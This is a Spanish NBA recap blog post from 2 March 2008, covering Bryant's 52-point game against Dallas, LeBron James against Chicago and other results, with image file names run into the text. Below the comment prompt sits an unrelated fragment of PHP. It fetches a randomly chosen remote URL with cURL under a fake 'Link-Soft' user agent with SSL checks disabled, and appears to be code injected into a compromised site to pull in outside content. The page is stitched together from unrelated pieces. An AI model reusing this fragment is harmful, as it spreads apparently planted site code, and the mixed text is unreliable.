La crónica (2/03/08)

03 de March de 2008 por MagicJohnson32

El fin de semana deparó un cambio en la cabeza del Oeste. San Antonio igualó con los Lakers al frente de la conferencia y las diferencias se han estrechado aún más, con sólo cinco partidos entre el dúo de cabeza y el equipo que cierra los puestos de Playoffs, los Warriors. No hay cambios importantes en el Este, aunque la lesión de Bosh puede facilitar a los Cavs la consecución de la cuarta plaza y la ventaja de campo en primera ronda.

La crónica:

hughesjameslaughEl domingo se inicio con dos interesantes partidos televisados por la ABC. Primero, el Cavs-Bulls, con todo el morbo de ver a Wallace, Hughes, Gooden, etc. con su nuevo uniforme ante el equipo para el que jugaban hasta hace unos díias. Hughes volvió a ser el mejor por parte de Chicago, que mantuvo la igualdad hasta el tramo final. Ahí, LeBron no dejó opción alguna a los Bulls y selló el partido de forma espectacular para dar la victoria 86-95 a los Cavs e irse hasta los 37 puntos, 6 rebotes y 6 asistencias.

A continuación, Mavs y Lakers protagonizaron un duelo con sabor a Playoffs, intensio y espectacular. Especialmente por parte de Kobe Bryant y Dirk Nowitzki. El alemán logró 30-13-5-2 y realizó un gran final de partido tras un inicio desacertado. Un triple suyo a dos segundos para el final mandó el partido a la prórroga, después de que Lakers desaprovechase varios tiros libres. Bryant, por su parte, anotó 22 puntos en el 4º periodo y 8 más en la prórroga para dar la victoria a su equipo por 108-104. Kobe, autor de 52 puntos, 11 rebotes, 4 asistencias y 2 tapones, fue el único laker que logró más de un 50% en tiros de campo, mientras que por los Mavs ese honor lo tuvieron Dampier (aprovechando la debilidad de Gasol en el poste) y Bass.

PARKERBOONECon una victoria y una derrota menos que Lakers se encuentran los Spurs tras ganar por novena ocasión seguida. Fue en New Jersey, por 93-83, con Manu de regreso a su rol de 6º hombre y con Tony Parker como mejor jugador (25 puntos, 8 rebotes y 7 asistencias). Duncan y Manu estuvieron más discretos pero la defensa y la aportación de Udoka sentenciaron a los Nets, en los que Carter y Harris anotaron 21 puntos

A los Hornets empieza a costarles seguir el ritmo de Spurs y Lakers. Anoche perdieron en Washington 84-101 y quedan a dos partidos de los líderes del Oeste. Paul no dominó como en otras noches y los Hornets encontraron problemas para anotar, mientras que Jamison sí resultó decisivo y sus 28 puntos y 9 rebotes llevaron a su equipo a la victoria.

Los Raptors echaron de menos a Chris Bosh ante los Bobcats, que dominaron los tableros con 18 rebotes de ataque y 32 puntos en segundas oportunidades, por 0 de su rival. Los 30 puntos de Richardson, los 14 con 15 rebotes de Okafor y los 17 con 10 de Jared Dudley fueron demasiado para Toronto, que tuvo a Anthony Parker como mejor jugador. Calderón dio 10 asistencias pero sólo anotó 4 puntos en la derrota 98-110.mikedunleavylayup

Tal vez los Pacers aún estén a tiempo de luchar por una plaza de Playoffs. Anoche lograron su segunda victoria seguida gracias a Mike Dunleavy, autor de 36 puntos en cada uno de los dos triunfos de su equipo. Dunleavy Jr. incluso mejoró anoche contra los Bucks su actuación frente a los Raptors, con una espectacular serie de 11 de 17 en tiros. Granger, con 27 puntos, fue su mejor aliado en la victoria por 106-128 ante unos Bucks que no levantan cabeza y a los que no les valió con los 28 puntos de Redd.

No pudieron aprovechar la ocasión para entrar en puestos de Playoffs los Hawks, aunque vendieron cara su derrota en Boston por 88-98, en lo que podría ser un anticipo de la primera ronda. Garnett, Pierce y Perkins fueron los mejores locales, mientras que Josh Smith, Horford y Bibby lo fueron por parte visitante.

El duelo entre equipos de la zona baja del Oeste lo ganó el menos malo. Los Sonics vencieron a los Wolves 111-108 en la prórroga, a la que se llegó tras una canasta de Durant y un error de Gomes. El candidato a RoY fue, junto a Wilcox, el más destacado de su equipo, aunque quien más brilló fue Al Jefferson, con 30 tmacvsdenverpuntos, 12 rebotes y 5 asistencias y pese a fallar dos tiros libres decisivos. Otro partido entre equipos sin posibilidades de alcanzar las series por el título fue el que disputaron en Sacramento los Kings y los Heat. La victoria fue para los locales por 109-120 gracias al cuarteto formado por Martin, Artest, Miller y Udrih, que superaron por completo la defensa de unos Heat que hace tiempo que dimieron de la actual temporada.

Puede que a los Rockets no les vaya tan mal sin Yao. Houston suma ya 15 victorias consecutivas, la de anoche ante los Nuggets por 89-103 con un gran rendimiento de todo el equipo tanto en defensa como en ataque. Scola, con 18 puntos y 14 rebotes, ejerció de referencia interior, McGrady logró 22-6-6 y Battier se fue a los 20 puntos con 5 triples. Los Warriors aprovecharon la derrota de los Nuggets para ampliar la diferencia con Denver a 1.5 partidos. Golden State superó a los Blazers 104-110 en otro partido equilibrado y que Stephen Jackson, Ellis y Davis sentenciaron en favor de los de Don Nelson pese a los 26-6-3 de Roy.kobewinsvsmavs

Nuestro MVP: Aunque de nuevo LeBron James se ha esforzado por aparecer en este galardón, hoy no hay discusión: 52 puntos (30 en el 4º cuarto y prórroga), 11 rebotes, 4 asistencias, 15 de 27 en tiros… Grande, muy grande, Kobe Bryant.

El rookie: Joakim Noah se ha afianzado en el puesto de center titular de los Bulls realizando buenas actuaciones como los 11 puntos y 8 rebotes de hoy; Al Horford y Kevin Durant siguen en su particular lucha por ser el rookie del año; y Jared Dudley (17 -10) y Brendan Wright (13 – 7 en 18 min) aprovechan sus minutos demostrando que son buenos jugadores.

La sorpresa: Noche de pívots sorpresa. Erick Dampier 16 puntos y 17 rebotes, Kendrick Perkins 11 puntos y 12 rebotes, y Chris Wilcox 18 puntos y 15 rebotes. ¿Qué les habrán dado de comer últimamente?

La decepción: Le tocó esta vez el partido malo a Andrea Bargnani, irregular por naturaleza. Y tampoco le fue mejor a Jerry Stackhouse que falló 2 de 12 de sus tiros y se quedó en sólo 4 puntos, colaborando en la derrotando de su equipo frente a los Lakers.

La canción: “With a little help from my friends”Joe Cocker, LeBron James & Kobe Bryant

James y Bryant tienen amigos nuevos. LeBron tiene a Ben Wallace, Joe Smith, Wally Sczcerbiak y Delonte West. Kobe tiene a Pau Gasol. Y los dos encaran el tramo final de la temporada dispuestos a todo. Para lograrlo necesitarán ayuda de sus amigos pero no mucha, como demostraron anoche ante los Bulls y Mavs respectivamente. Sus respectivas actuaciones, descomunales, valieron sendas victorias pese a que sus compañeros no acompañaron demasiado. Lo escribió Lennon y Joe Cocker lo cantó como nadie: “Gonna try with a little help from my friends”. A veces, un poco de ayuda es suficiente.

Finalizamos con las 10 mejores acciones de la noche:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>